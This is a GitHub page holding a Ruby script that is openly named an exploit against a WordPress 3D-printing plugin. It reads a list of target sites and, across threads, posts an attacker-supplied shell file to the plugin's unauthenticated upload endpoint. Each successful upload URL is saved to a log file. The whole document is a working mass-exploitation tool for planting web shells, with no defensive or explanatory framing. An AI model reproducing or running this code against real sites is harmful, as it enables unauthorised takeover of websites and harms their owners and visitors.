-
Notifications
You must be signed in to change notification settings - Fork 0
/
3d_print_lite.rb
141 lines (117 loc) · 3.29 KB
/
3d_print_lite.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
require 'optparse'
require 'httparty'
require 'eventmachine'
require 'uri'
class D3_Print_Exploit
def initialize
@params = {
input_file: nil,
shell_file: nil,
output_file: 'output.txt',
}
@vuln_urls = []
@threads = []
@headers = {
'User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0'
}
end
def check_site(domain)
target_domain = URI.parse(domain)
plugin_url = "#{target_domain.scheme}:https://#{target_domain.host}/wp-admin/admin-ajax.php?action=p3dlite_handle_upload"
begin
response = HTTParty.post(plugin_url, headers: @headers, timeout: 3)
if response.body.include?("jsonrpc")
response_shell = HTTParty.post(plugin_url, body: { 'file' => File.new(@params[:shell_file]) })
if response_shell.body.include?(File.basename(@params[:shell_file]))
File.open(@params[:output_file], "a+") do |file_manager|
file_manager.puts("#{target_domain.scheme}:https://#{target_domain.host}/wp-content/uploads/p3d/#{File.basename(@params[:shell_file])}")
end
puts("#{plugin_url} --> Uploaded".green)
else
puts("#{plugin_url} --> Not Vuln".red)
end
else
puts("#{plugin_url} --> Not Vuln".red)
end
rescue Net::OpenTimeout
puts("#{plugin_url} --> Not Vuln".red)
rescue StandardError
puts("#{plugin_url} --> Not Vuln".red)
end
end
def print_help
help_text = <<-'HELP_TEXT'
USAGE: ruby upload_checker.rb [options]
OPTIONS:
-i, --input_file INPUT_FILE: Define the path to the URL file.
-o, --output_file OUTPUT_FILE: Define the name of the output log file.
-s, --shell_file SHELL_FILE: Define the path of the shell file.
HELP_TEXT
puts(help_text.magenta)
end
def opt_parser
begin
OptionParser.new do |opts|
opts.on "-i", "--input_file INPUT_FILE" do |input_file|
if File.exist?(input_file)
@params[:input_file] = input_file
else
puts("File not found: #{input_file}".red)
exit(1)
end
end
opts.on "-s", "--shell_file INPUT_FILE" do |shell_file|
if File.exist?(shell_file)
@params[:shell_file] = shell_file
else
puts("Shell File not found: #{shell_file}".red)
exit(1)
end
end
opts.on "-o", "--output_file OUTPUT_FILE" do |output_file|
@params[:output_file] = output_file
end
end.parse!
rescue Exception => exception
puts("Error: #{exception}")
end
end
def parse_lines(group)
group.each do |line|
check_site(line.strip)
end
end
def main
opt_parser
unless @params[:input_file].nil? and @params[:shell_file].nil?
lines = File.readlines(@params[:input_file])
lines.each_slice(4) do |group_lines|
@threads << Thread.new { parse_lines(group_lines) }
end
@threads.each(&:join)
puts()
puts("Exploit completed.".magenta)
EM.stop
else
print_help
EM.stop
end
end
end
class String
def red
"\e[31m#{self}\e[0m"
end
def green
"\e[32m#{self}\e[0m"
end
def magenta
"\e[35m#{self}\e[0m"
end
end
EM.run do
EM.defer do
exploit = D3_Print_Exploit.new
exploit.main
end
end